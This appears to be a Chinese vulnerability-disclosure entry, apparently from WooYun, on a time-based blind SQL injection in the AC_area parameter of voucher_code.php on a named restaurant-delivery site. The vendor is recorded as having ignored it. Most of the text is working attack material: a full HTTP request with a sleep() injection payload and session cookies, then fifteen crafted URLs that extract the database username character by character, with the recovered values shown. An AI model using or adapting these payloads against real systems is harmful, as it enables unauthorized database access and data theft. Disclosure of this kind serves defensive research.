2015-11-25: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经主动忽略漏洞,细节向公众公开
POST /voucher_code.php?AC_area=if(now()=sysdate(),sleep(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0 HTTP/1.1Content-Length: 66Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://suzhou.daojia.com.cn:80/Cookie: PHPSESSID=eb1493038249ba3636463480acfca0ae; currentCity=4; SERVERID=2; daojia=[][][4][][/restaurant.php%3Fa%3D154%26r%3D495][/restaurant.php%3Fa%3D138%26r%3D297][][0]; DaojiaDinnerBox=; CNZZDATA2288838=cnzz_eid%3D1383096924-1448295637-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1448295637; Hm_lvt_94cfa510944eefd27564a777cd1d4ec5=1448313273,1448313387,1448313474,1448313552; Hm_lpvt_94cfa510944eefd27564a777cd1d4ec5=1448313552; HMACCOUNT=B0CF0EBEA2DCAFB6Host: suzhou.daojia.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*action=1879048197&code=94102&passwd=g00dPa%24%24w0rD&user=wqiybtln
延迟9秒
为真时,延迟9秒
为假时,无延迟
user:daojia@10.0.0.1
http://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),1,1))=100,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第1位:dhttp://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),2,1))=97,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第2位:ahttp://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),3,1))=111,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第3位:ohttp://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),4,1))=106,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第4位:jhttp://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),5,1))=105,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第5位:ihttp://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),6,1))=97,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第6位:ahttp://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),7,1))=64,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第7位:@http://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),8,1))=49,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第8位:1http://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),9,1))=48,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第9位:0http://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),10,1))=46,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第10位:.http://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),11,1))=48,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第11位:0http://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),12,1))=46,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第12位:.http://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),13,1))=48,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第13位:0http://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),14,1))=46,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第14位:.http://suzhou.daojia.com.cn:80/voucher_code.php?AC_area=if(now()=sysdate() and ascii(mid(lower(user()),15,1))=49,SLEEP(3),0)&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E9%A4%90%E5%8E%85%E5%90%8D%E7%A7%B0第15位:1
过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-30 14:34
漏洞Rank:4 (WooYun评价)
暂无